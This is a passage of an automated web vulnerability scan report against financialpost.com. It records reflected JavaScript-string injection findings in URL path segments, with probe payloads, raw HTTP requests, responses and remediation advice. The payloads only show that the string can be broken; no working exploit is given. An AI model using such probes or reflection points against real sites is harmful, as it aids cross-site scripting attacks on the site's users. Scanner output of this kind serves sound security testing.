P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37416
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2a5c'%3bdbe23d485fd was submitted in the REST URL parameter 1. This input was echoed as d2a5c';dbe23d485fd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executived2a5c'%3bdbe23d485fd/hr/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43275
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c50a'%3b34e2fdea153 was submitted in the REST URL parameter 2. This input was echoed as 1c50a';34e2fdea153 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/hr1c50a'%3b34e2fdea153/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43240
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d117'%3b6a5beb61248 was submitted in the REST URL parameter 1. This input was echoed as 8d117';6a5beb61248 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive8d117'%3b6a5beb61248/smart-shift/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37612
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1806'%3b95ff51b1cd7 was submitted in the REST URL parameter 2. This input was echoed as c1806';95ff51b1cd7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/smart-shiftc1806'%3b95ff51b1cd7/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43420
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46365'%3b0515ef5e13 was submitted in the REST URL parameter 1. This input was echoed as 46365';0515ef5e13 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive46365'%3b0515ef5e13/social+media+worth+investment/3972248/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79029
Expires: Sun, 19 Dec 2010 03:12:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:24 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive46365';0515ef5e13/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive46365';0515ef5e13;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=76882130?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbf67'%3bc8bd6c0d374 was submitted in the REST URL parameter 3. This input was echoed as dbf67';c8bd6c0d374 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/social+media+worth+investment/3972248dbf67'%3bc8bd6c0d374/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70627
Expires: Sun, 19 Dec 2010 03:12:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:33 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/social-media-worth-investment/3972248dbf67';c8bd6c0d374/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=social-media-worth-investment;kw=3972248dbf67';c8bd6c0d374;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord= ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 765b9'%3ba07db4f3a59 was submitted in the REST URL parameter 4. This input was echoed as 765b9';a07db4f3a59 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/social+media+worth+investment/3972248/765b9'%3ba07db4f3a59 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44205
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b4ce'%3b81b991a8c20 was submitted in the REST URL parameter 1. This input was echoed as 2b4ce';81b991a8c20 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive2b4ce'%3b81b991a8c20/women/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43335
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aa96'%3bb6cfa407c54 was submitted in the REST URL parameter 2. This input was echoed as 4aa96';b6cfa407c54 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/women4aa96'%3bb6cfa407c54/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44120
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18de6'%3b4749081e3e1 was submitted in the REST URL parameter 1. This input was echoed as 18de6';4749081e3e1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images18de6'%3b4749081e3e1/favicon.ico HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55; s_cc=true; s_depth=1; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:12 GMT
Date: Sun, 19 Dec 2010 03:03:12 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43028
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a887a'%3b741dad57e16 was submitted in the REST URL parameter 2. This input was echoed as a887a';741dad57e16 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/a887a'%3b741dad57e16 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55; s_cc=true; s_depth=1; s_sq=%5B%5BB%5D%5D
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:20 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43044
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42deb'%3bac05bd1a0a1 was submitted in the REST URL parameter 1. This input was echoed as 42deb';ac05bd1a0a1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes42deb'%3bac05bd1a0a1/header/ccn-login.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:12 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43285
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71f71'%3bf62fcd6e2bf was submitted in the REST URL parameter 2. This input was echoed as 71f71';f62fcd6e2bf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/header71f71'%3bf62fcd6e2bf/ccn-login.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:17 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 39220
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 172af'%3b120f40364cb was submitted in the REST URL parameter 3. This input was echoed as 172af';120f40364cb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/header/172af'%3b120f40364cb HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:25 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43251
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 290f4'%3b344b87b1ee4 was submitted in the REST URL parameter 1. This input was echoed as 290f4';344b87b1ee4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes290f4'%3b344b87b1ee4/sidebar/most-popular/iframed.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:14 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43593
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 678d7'%3bfe2c818c345 was submitted in the REST URL parameter 2. This input was echoed as 678d7';fe2c818c345 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/sidebar678d7'%3bfe2c818c345/most-popular/iframed.html HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:57:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:57:19 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 39528
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61041'%3bebbe0febebf was submitted in the REST URL parameter 3. This input was echoed as 61041';ebbe0febebf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
